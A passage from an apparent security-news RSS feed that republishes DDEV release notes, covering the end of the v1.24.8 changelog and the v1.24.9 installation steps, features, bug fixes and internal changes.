<li>build(deps): bump actions/github-script from 7 to 8 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3394615234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7600" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7600/hovercard" href="https://github.com/ddev/ddev/pull/7600">#7600</a></li>
<li>feat: provide <code>host.docker.internal</code> for all services, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3332171904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7537" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7537/hovercard" href="https://github.com/ddev/ddev/issues/7537">#7537</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3362857741" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7572" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7572/hovercard" href="https://github.com/ddev/ddev/pull/7572">#7572</a></li>
<li>test(xhgui): add more retries for GetLocalHTTPResponse, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339236069" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7543/hovercard" href="https://github.com/ddev/ddev/pull/7543">#7543</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3397807873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7606" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7606/hovercard" href="https://github.com/ddev/ddev/pull/7606">#7606</a></li>
<li>feat(add-ons): add-on dependencies should be automatically downloaded, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1898894253" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5337" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5337/hovercard" href="https://github.com/ddev/ddev/issues/5337">#5337</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3379994018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7586" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7586/hovercard" href="https://github.com/ddev/ddev/pull/7586">#7586</a></li>
<li>test: re-enable no-bind-mounts test since it's used some places [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3387593660" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7591" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7591/hovercard" href="https://github.com/ddev/ddev/pull/7591">#7591</a></li>
<li>fix(laravel): don't edit database config in <code>.env</code> when there's no database by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3378833304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7584" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7584/hovercard" href="https://github.com/ddev/ddev/pull/7584">#7584</a></li>
<li>feat: use DDEV_GITHUB_TOKEN as bearer token for downloads from GitHub, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1859168050" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5285" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5285/hovercard" href="https://github.com/ddev/ddev/issues/5285">#5285</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391673483" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7598" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7598/hovercard" href="https://github.com/ddev/ddev/pull/7598">#7598</a></li>
<li>refactor(add-ons): dependencies in add-ons must be canonical, can't be relative or absolute by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3407387911" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7613" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7613/hovercard" href="https://github.com/ddev/ddev/pull/7613">#7613</a></li>
<li>docs: fix typo in documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hockdudu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hockdudu">@hockdudu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411404301" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7618" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7618/hovercard" href="https://github.com/ddev/ddev/pull/7618">#7618</a></li>
<li>fix(ddev-php-base): Remove php8.4-obsolete config, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3410137550" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7616" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7616/hovercard" href="https://github.com/ddev/ddev/issues/7616">#7616</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411153917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7617" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7617/hovercard" href="https://github.com/ddev/ddev/pull/7617">#7617</a></li>
<li>docs: remove Prerequisite section by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gitressa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gitressa">@gitressa</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414954874" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7621" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7621/hovercard" href="https://github.com/ddev/ddev/pull/7621">#7621</a></li>
<li>docs: clarify comments in the Drupal 10 and 11 quickstarts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3413872313" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7619" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7619/hovercard" href="https://github.com/ddev/ddev/issues/7619">#7619</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brookemahoney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brookemahoney">@brookemahoney</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414204022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7620" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7620/hovercard" href="https://github.com/ddev/ddev/pull/7620">#7620</a></li>
<li>feat: add <code>ddev npx</code> command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391957933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7599" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7599/hovercard" href="https://github.com/ddev/ddev/pull/7599">#7599</a></li>
<li>docs: offer help on out-of-disk-space warning, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3387649991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7592" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7592/hovercard" href="https://github.com/ddev/ddev/issues/7592">#7592</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3417866933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7622" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7622/hovercard" href="https://github.com/ddev/ddev/pull/7622">#7622</a></li>
<li>build: bump <code>docker-compose</code> to v2.39.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419613881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7623" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7623/hovercard" href="https://github.com/ddev/ddev/pull/7623">#7623</a></li>
<li>docs: add GitHub Copilot instructions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896811" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7626" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7626/hovercard" href="https://github.com/ddev/ddev/issues/7626">#7626</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896929" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7627" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7627/hovercard" href="https://github.com/ddev/ddev/pull/7627">#7627</a></li>
<li>build: bump Docker images to v1.24.8 for release, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320030923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7526" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7526/hovercard" href="https://github.com/ddev/ddev/issues/7526">#7526</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3422665433" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7628" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7628/hovercard" href="https://github.com/ddev/ddev/pull/7628">#7628</a></li>
<li>fix: don't show timeout suggestion for ddev-router and ddev-ssh-agent on <code>ddev start</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3425827964" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7633" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7633/hovercard" href="https://github.com/ddev/ddev/pull/7633">#7633</a></li>
<li>chore: update <code>schema.json</code>, <code>global_config.yaml</code>, <code>config.yaml</code> templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3426016207" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7634" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7634/hovercard" href="https://github.com/ddev/ddev/pull/7634">#7634</a></li>
<li>feat: improve <code>ddev debug test</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3426408977" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7636" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7636/hovercard" href="https://github.com/ddev/ddev/pull/7636">#7636</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adiati98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adiati98">@adiati98</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3254098957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7476/hovercard" href="https://github.com/ddev/ddev/pull/7476">#7476</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260387579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7482/hovercard" href="https://github.com/ddev/ddev/pull/7482">#7482</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175289326" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7399" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7399/hovercard" href="https://github.com/ddev/ddev/pull/7399">#7399</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3266115981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7486/hovercard" href="https://github.com/ddev/ddev/pull/7486">#7486</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3378833304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7584" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7584/hovercard" href="https://github.com/ddev/ddev/pull/7584">#7584</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hockdudu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hockdudu">@hockdudu</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411404301" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7618" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7618/hovercard" href="https://github.com/ddev/ddev/pull/7618">#7618</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brookemahoney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brookemahoney">@brookemahoney</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414204022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7620" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7620/hovercard" href="https://github.com/ddev/ddev/pull/7620">#7620</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391957933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7599" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7599/hovercard" href="https://github.com/ddev/ddev/pull/7599">#7599</a></li>
<li>@Copilot made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896929" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7627" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7627/hovercard" href="https://github.com/ddev/ddev/pull/7627">#7627</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.7...v1.24.8"><tt>v1.24.7...v1.24.8</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.9]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the ddev_windows_amd64_installer.v1.24.9.exe; ...]]></description>
<link>https://tsecurity.de/de/3497299/downloads/v1249/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497299/downloads/v1249/</guid>
<pubDate>Thu, 07 May 2026 22:17:23 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://github.com/ddev/ddev/releases/download/v1.24.9/ddev_windows_amd64_installer.v1.24.9.exe">ddev_windows_amd64_installer.v1.24.9.exe</a>; you can run it for install or upgrade.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>⚠ Warning</h2>
<p>DDEV v1.24.9 release introduced a regression affecting CI environments (e.g., GitHub Actions) when using custom project TLDs. <strong>Do not use v1.24.9 in CI.</strong> Upgrade to v1.24.10 instead. Local-only users are unaffected.</p>
<h2>Highlights</h2>
<ul>
<li>Support for PHP 8.5.0 RC 3 (note: some extensions are not yet available: apcu, imagick, memcached, redis, uploadprogress, xdebug, xhprof, xmlrpc, yaml)</li>
<li>Support for PostgreSQL 18</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/managing-projects/#access-another-project-via-https" rel="nofollow">Automatic HTTP/S communication between DDEV projects</a> - no need to manually configure <code>external_links</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#omit_project_name_by_default" rel="nofollow">Option to omit project names</a> in <code>.ddev/config.yaml</code> by default with <code>ddev config global --omit-project-name-by-default=true</code> - useful when working with multiple Git worktrees</li>
<li>Auto-discovery of <code>PLATFORM_PROJECT</code> and <code>PLATFORM_ENVIRONMENT</code> from existing config for <a href="https://docs.ddev.com/en/stable/users/providers/upsun/#upsun-per-project-configuration" rel="nofollow">Upsun Flex</a> and <a href="https://docs.ddev.com/en/stable/users/providers/platform/#upsun-fixedplatformsh-per-project-configuration" rel="nofollow">Upsun Fixed (Platform.sh)</a> provider integrations</li>
</ul>
<h2>Features</h2>
<ul>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-diagnose" rel="nofollow"><code>ddev utility diagnose</code></a> command for quick diagnostics on your DDEV installation and current project</li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-search" rel="nofollow"><code>ddev add-on search</code></a> command, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>New <a href="https://docs.ddev.com/en/stable/users/usage/commands/#xdebug" rel="nofollow"><code>ddev xdebug info</code></a> command to display <code>xdebug_info()</code> output</li>
<li>Customize <a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> output using the <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#customizing-ddev-describe-output" rel="nofollow"><code>x-ddev.describe-*</code> extensions</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>Change <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a> shell using the <a href="https://docs.ddev.com/en/stable/users/extend/in-container-configuration/#changing-ddev-ssh-shell" rel="nofollow"><code>x-ddev.ssh-shell</code> extension</a> - useful for <a href="https://addons.ddev.com/" rel="nofollow">add-ons</a></li>
<li>New <code>--user</code>/<code>-u</code> flag for <a href="https://docs.ddev.com/en/stable/users/usage/commands/#exec" rel="nofollow"><code>ddev exec</code></a> and <a href="https://docs.ddev.com/en/stable/users/usage/commands/#ssh" rel="nofollow"><code>ddev ssh</code></a></li>
<li><code>exec</code> hooks now <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/#exec-execute-a-shell-command-in-a-container-defaults-to-web-container" rel="nofollow">support the <code>user</code> field</a></li>
<li>New <code>pre-share</code> and <code>post-share</code> <a href="https://docs.ddev.com/en/stable/users/configuration/hooks/" rel="nofollow">hooks</a>. This can help change the required URL for <code>ddev share</code> in CMSs like WordPress and Magento2.</li>
<li>PostgreSQL connection support in <a href="https://docs.ddev.com/en/stable/users/usage/commands/#heidisql" rel="nofollow"><code>ddev heidisql</code></a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a></li>
<li>Show failed container logs on project start by running <code>DDEV_DEBUG=true ddev start</code></li>
<li>Enhanced <a href="https://docs.ddev.com/en/stable/users/configuration/config/#composer_root" rel="nofollow"><code>composer_root</code></a> support for app <a href="https://docs.ddev.com/en/stable/users/configuration/config/#type" rel="nofollow"><code>type</code></a> detection in CakePHP, Craft CMS, Laravel, Magento 2, Shopware 6, and Symfony, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vanWittlaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vanWittlaer">@vanWittlaer</a> for initial PR for Shopware 6</li>
<li>Silence warnings about custom configuration files in the <code>.ddev</code> directory by adding <code>#ddev-silent-no-warn</code> to the file. <a href="https://docs.ddev.com/en/stable/users/usage/faq/#what-if-i-dont-like-the-settings-files-or-gitignores-ddev-creates" rel="nofollow">Documentation</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>PostgreSQL now runs as container user (mirrored from host user) instead of <code>postgres:postgres</code></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#describe" rel="nofollow"><code>ddev describe</code></a> now works with stopped or broken containers</li>
<li>Improved support for <code>DDEV_*</code> environment variables in PHP-based add-ons</li>
<li><code>APP_DEFAULT_LOCALE</code> is no longer overridden in CakePHP, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a></li>
<li>Removed hardcoded <code>--server-id=0</code> parameter from MySQL/MariaDB startup, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a></li>
<li>Fixed <code>docker-compose</code> warnings on <code>ddev start</code> when project root <code>.env</code> file contains dollar signs</li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#add-on-get" rel="nofollow"><code>ddev add-on get</code></a> now retries without authentication on invalid GitHub token</li>
<li>Debug and verbose output now suppressed when using <code>--json-output</code>/<code>-j</code> flag</li>
<li>Non-interactive mode now forced in non-tty environments</li>
<li>Improved container username sanitization with better fallback handling</li>
<li>Fixed <code>blackfire-php</code> installation for older PHP versions</li>
<li>Fixed bug with broken label in Mutagen volume when path to Docker socket is too long</li>
<li>Fixed intermittent hang in <code>ddev auth ssh</code> when SSH key is password-protected</li>
<li>Fixed hang in <code>ddev start</code> on macOS when temp directory permissions are broken after macOS upgrade (fixed in <code>docker-compose</code>)</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>PHP 8.1 no longer preinstalled in <a href="https://hub.docker.com/r/ddev/ddev-webserver" rel="nofollow">ddev/ddev-webserver</a> to reduce image size</li>
<li>Native ARM builder now used for building DDEV Docker images, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility" rel="nofollow"><code>ddev utility</code></a> is now the primary command (<code>ddev debug</code> moved to alias)</li>
<li>Healthcheck added to <a href="https://hub.docker.com/r/ddev/ddev-xhgui" rel="nofollow">ddev/ddev-xhgui</a> image</li>
<li>Linux tests now run separately instead of in matrix, allowing single test restarts on failure</li>
<li>Improved support for <code>CI=true</code> in GitHub Actions</li>
<li>Vite setup documentation migrated into <a href="https://docs.ddev.com/en/stable/users/usage/vite/" rel="nofollow">DDEV docs</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandrasch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandrasch">@mandrasch</a> for continuous support on the <a href="https://ddev.com/blog/working-with-vite-in-ddev/" rel="nofollow">blog article</a></li>
<li>Improved <a href="https://docs.ddev.com/en/stable/users/quickstart/" rel="nofollow">quickstarts</a> code block formatting to resolve copy/paste issues in some terminals</li>
<li>Added <code>docker-buildx</code> dependency for <a href="https://aur.archlinux.org/packages/ddev-bin" rel="nofollow">AUR</a> installation</li>
<li>Internet detection now uses <code>one.one.one.one</code> instead of <code>test.ddev.site</code></li>
<li>Replaced <code>GITHUB_OWNER</code> with <code>DDEV_GITHUB_OWNER</code> in <a href="https://ddev.com/install.sh" rel="nofollow">https://ddev.com/install.sh</a></li>
<li>Switched to lightweight <a href="https://mcr.microsoft.com/en-us/artifact/mar/devcontainers/base/about" rel="nofollow">debian-12</a> image for GitHub Codespaces</li>
<li>Removed Gitpod configuration (service is <a href="https://ona.com/stories/gitpod-classic-payg-sunset" rel="nofollow">no longer available</a>)</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.3.27, 8.4.14, and 8.5.0 RC 3</li>
<li>Docker Compose v2.40.3</li>
<li>Updated <a href="https://docs.ddev.com/en/stable/users/quickstart/#moodle" rel="nofollow">quickstart</a> for <a href="https://moodledev.io/general/releases/5.1" rel="nofollow">Moodle 5.1</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>build(aur): add docker-buildx dependency by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3427998201" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7637" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7637/hovercard" href="https://github.com/ddev/ddev/pull/7637">#7637</a></li>
